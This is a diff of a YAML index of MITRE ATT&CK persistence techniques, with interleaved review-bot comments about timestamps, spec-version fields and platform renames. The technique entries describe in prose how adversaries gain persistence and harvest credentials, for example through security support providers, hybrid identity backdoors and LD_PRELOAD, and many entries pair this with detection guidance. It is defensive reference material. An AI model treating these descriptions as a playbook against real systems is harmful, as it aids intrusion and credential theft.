- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.011:
technique:
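Review bot: the new T1098.007 object ends at `atomic_tests: []` with no `identifier:` key, and T1137.005 lacks it both before and after, while T1505.005, T1176 and T1546.011 carry `identifier: <id>` between `x_mitre_modified_by_ref` and `atomic_tests`; if the index builders read `identifier`, it should be emitted for every technique, and if it is vestigial it should be dropped everywhere rather than left inconsistent. Two content changes in T1137.005 are worth calling out in the commit message: `x_mitre_permissions_required` (Administrator, User) is removed with no replacement, and the platform `Office 365` becomes `Office Suite` with `x_mitre_version` 1.1 -> 1.2, so any output keyed on the old platform string will silently lose this technique. T1098.007 lands with `x_mitre_detection: ''`, which is what upstream ships; that is acceptable for a sync but means the persistence index gains a technique with no detection guidance. Finally, `PRPR_RULE_MSG_NAME` in the detection text has a doubled prefix next to its sibling `PR_RULE_MSG_PROVIDER` and looks like an upstream typo; leave it as-is here and report it upstream.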
@@ -29386,7 +29820,7 @@ persistence:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
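Review bot: `modified` for T1546.011 moves backwards, from `2022-04-25T14:00:00.188Z` to `2020-11-10T18:29:31.094Z`. The same regression appears for T1037.002, T1205, T1525, T1547.005 and T1543.004 later in this diff, and every removed value shares the `14:00:00.188Z` (or `.188Z`) time-of-day, which reads like a stamp applied by an earlier export rather than an upstream value. If that is the case the new timestamps are the genuine ATT&CK `modified` values and the commit message should say so; if not, a `modified` that goes backwards should be rejected, since downstream "what changed since" logic depends on it being monotonic.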
@@ -29441,13 +29875,11 @@ persistence:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
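Review bot: removing `x_mitre_attack_spec_version: 2.1.0` from T1546.011 together with `spec_version` leaves the object with no attack spec version at all; unlike T1547.009 and T1574.008, where a 3.2.0 value is added back elsewhere in the object, nothing in the visible hunks restores it here, and T1525 gets the same treatment further down. If the generator only emits the field when upstream carries it, say so in the commit message; otherwise confirm this is not a lost field before merging.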
@@ -29508,9 +29940,9 @@ persistence:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -29519,7 +29951,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -29572,7 +30003,7 @@ persistence:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -29593,12 +30024,11 @@ persistence:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -29682,11 +30112,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -29699,7 +30128,6 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -29712,7 +30140,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -29742,7 +30169,8 @@ persistence:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1525:
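Review bot: the `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` lines added here balance the removals of the 2.1.0 value and the `x_mitre_modified_by_ref` line two hunks earlier in the same T1547.009 object, so the net effect is a spec-version bump plus a key move, with `spec_version` dropped as elsewhere. No field is lost, but three hunks for one logical change is exactly the churn a stable key order in the generator would avoid.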
@@ -29774,7 +30202,7 @@ persistence:
url: https://github.com/RhinoSecurityLabs/ccat
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:27:49.094Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -29796,8 +30224,6 @@ persistence:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.005:
technique:
@@ -29823,7 +30249,7 @@ persistence:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -29849,36 +30275,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
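Review bot: the Azure AD -> Entra ID rename is correctly limited to the prose; the citation keys `Azure AD Hybrid Identity`, `Azure AD Connect for Read Teamers` and `AADInternals Azure AD On-Prem to Cloud`, and the literal service name `AzureADConnectAuthenticationAgentService`, are untouched. Keep it that way: the `(Citation: ...)` keys must match `source_name` entries in `external_references`, and the service name is the actual Windows service, so a global find/replace would break both. `Read Teamers` in the citation key looks like an upstream typo, but it is a key and must stay as upstream spells it.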
@@ -29886,9 +30310,9 @@ persistence:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -29897,21 +30321,22 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
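Review bot: `x_mitre_platforms` for T1556.007 drops `Azure AD`, `Google Workspace` and `Office 365` and adds `Office Suite` and `Identity Provider`, with `x_mitre_version` 1.0 -> 1.1. Any index or filter that keys on the old platform strings will stop matching this technique, so the generator's platform mapping needs entries for the two new names before this is merged; the commit message should mention the platform consolidation since it changes which per-platform outputs include the technique. The remaining lines in this hunk (`x_mitre_attack_spec_version: 3.2.0`, `x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_domains`, `x_mitre_is_subtechnique`, `x_mitre_modified_by_ref`) are moves of fields that are removed further down in the same object, not additions.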
@@ -29951,13 +30376,10 @@ persistence:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
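Review bot: the three removals at the head of this hunk (`x_mitre_attack_spec_version: 2.1.0`, `x_mitre_modified_by_ref`, `spec_version`) are the tail end of the T1556.007 key move; the first two reappear earlier in the object with the spec bumped to 3.2.0, so nothing is lost. The T1543.004 `modified` regression to `2023-03-30T21:01:48.453Z` follows the same pattern as the other `T14:00:00.188Z` values in this diff and should be covered by the same explanation in the commit message. The context description for T1543.004 shows the same mid-token line breaks (`/System/Library/LaunchDaemons/` / `and`, `Label` / `to identify`) seen in T1505.005, so the export-side markup stripping affects more than one object.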
@@ -30034,12 +30456,11 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30058,6 +30479,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -30065,7 +30487,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -30085,29 +30506,31 @@ persistence:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1505.003:
@@ -30184,12 +30607,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.003
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30204,6 +30626,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -30212,18 +30635,18 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
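Review bot: `x_mitre_platforms` loses `Azure AD`, `Office 365` and `Google Workspace` and gains `Office Suite` and `Identity Provider`, in line with the upstream platform consolidation that bumps this object to `1.4`. Any per-platform index derived from `x_mitre_platforms` will need a mapping from the old names to the new ones, otherwise indexes keyed on `Azure AD`, `Office 365` or `Google Workspace` silently lose every technique that was re-labelled this way; worth checking the generated platform CSVs in the same change rather than assuming they still populate.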
@@ -30255,9 +30678,6 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -30329,7 +30749,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -30356,7 +30775,7 @@ persistence:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
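Review bot: the `modified` timestamp for T1546.005 moves backwards, from `2021-04-29T14:49:39.188Z` to `2020-03-24T16:43:02.273Z`, with no other change to the object in this hunk. The same backwards move happens for T1574.006, T1546.012, T1574.005, T1546.008, T1542.002, T1546.009, T1547.015, T1205.001 and T1556.008 later in this diff, while T1574.008, T1078.001, T1098.005, T1098.001 and T1554 move forwards. The old values share the `14:00:00.188Z` / `14:49:39.188Z` pattern of bulk-migration timestamps, so this looks like the regeneration now reads a different bundle (or a different field) for these objects than the previous run did; please confirm which source is intended so the timestamps do not flip back on the next regeneration.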
@@ -30382,13 +30801,11 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
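Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1546.005 without a replacement, so the object ends up with no attack spec version at all, whereas techniques elsewhere in this diff keep or update theirs (T1574.006 keeps `3.1.0` in the next hunk, T1574.008 goes to `3.2.0`). The same removal-without-replacement applies to T1546.012, T1574.005, T1542.002, T1546.009, T1547.015 and T1205.001. Combined with the `modified` timestamp for this object going back to 2020-03-24, this suggests these particular techniques are being sourced from a snapshot that predates the spec-version field; check that every technique is pulled from the same bundle before merging.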
@@ -30509,7 +30926,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1136.001:
@@ -30581,7 +30997,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.001
atomic_tests: []
T1547.004:
@@ -30651,7 +31066,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -30761,7 +31175,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -30815,7 +31228,7 @@ persistence:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -30848,8 +31261,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1574.005:
@@ -30880,7 +31291,7 @@ persistence:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -30915,12 +31326,10 @@ persistence:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -30997,7 +31406,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1136.002:
@@ -31051,7 +31459,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.002
atomic_tests: []
T1542.002:
@@ -31083,7 +31490,7 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
